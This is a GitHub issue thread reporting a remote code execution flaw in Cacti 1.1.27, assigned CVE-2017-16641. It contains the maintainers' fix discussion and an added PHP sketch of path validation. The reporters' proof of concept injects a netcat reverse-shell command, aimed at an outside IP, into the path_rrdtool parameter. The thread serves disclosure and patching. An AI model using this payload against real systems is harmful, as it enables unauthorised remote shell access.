Critical vuln in cacti 1.1.27 #1057
Comments
|
We will address this using two techniques. The first will be to conduct validation on the two form types: dirpath, and filepath. If, for these two form types, either the directory does not exist, or the file does not exist, the save will be rejected. Then, as you mentioned, in the case where for some reason a Cacti admin has intentionally added a back door, or some SQL injection has allowed this modification, we will pre-check the path as you described. |
- Potential vulnerability in RRDtool functions
- Adding validation to both dirpath and filepath, also verification of executable status to files in RRDtool function.
- Spurious htmlspecialchars() to html_escape() calls
- Minor SQL formatting for readability
|
Resolved, and thanks for reporting! We really appreciate those who comb the Cacti code for potential exploits. |
|
Thanks for the answer, but we think that this needs a CVE to be enumerated. |
|
Is there an open CVE for this issue? If not, please submit your findings and get us a CVE. |
|
We didn't open a CVE for this issue. We will send it shortly. |
|
Use CVE-2017-16641 |
|
@ronytomen now it can be closed |
We (worlak2 and cibvetr2) found an RCE vuln with black-box fuzzing.


PoC
1) Send in POST parameter path_rrdtool -> nc -e /bin/bash 192.168.1.214 1337 #
2) After 2-5 minutes we have a backconnect shell
It’s triggered after poller.php executes in process. We think that is because $command is not filtered in ./lib/rrd.php:39-40
With regards, worlak2 and cibvetr2
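The two checks the maintainer describes in the first comment (reject a filepath setting on save unless the file exists, then pre-check the stored path again before it is executed), sketched as an added example that is not Cacti's own code. The function names and sample values are hypothetical, and the shell-free `proc_open()` call is an extra hardening step beyond what the thread describes.

```php
<?php
// Added example; function names are hypothetical, not Cacti's API.

/**
 * Save-time check for a "filepath" setting: accept only a value that
 * names an existing regular file. Returns the canonical path, or null.
 */
function validate_filepath_setting(string $value): ?string {
    $value = trim($value);
    // Control characters never belong in a stored path.
    if ($value === '' || preg_match('/[\x00-\x1f\x7f]/', $value)) {
        return null;
    }
    // realpath() returns false for a path that does not exist, so a value
    // with shell syntax appended fails unless a file has exactly that name.
    $real = realpath($value);
    return ($real !== false && is_file($real)) ? $real : null;
}

/**
 * Use-time pre-check: the stored value may have been changed behind the
 * form (for example directly in the database), so verify it again and
 * confirm it is executable before running it.
 */
function run_configured_binary(string $stored_path, array $args): array {
    $binary = validate_filepath_setting($stored_path);
    if ($binary === null || !is_executable($binary)) {
        throw new RuntimeException('configured binary path rejected');
    }
    // Array form of proc_open() (PHP 7.4+) starts the program directly,
    // without a shell, so metacharacters in arguments stay literal.
    $proc = proc_open(array_merge([$binary], $args),
        [1 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start process');
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    return [proc_close($proc), $out];
}

// Constructed sample values: the running PHP binary stands in for rrdtool.
var_dump(validate_filepath_setting(PHP_BINARY) !== null);
var_dump(validate_filepath_setting('/usr/bin/rrdtool; id #'));
var_dump(run_configured_binary(PHP_BINARY, ['-r', 'echo "ok";']));
```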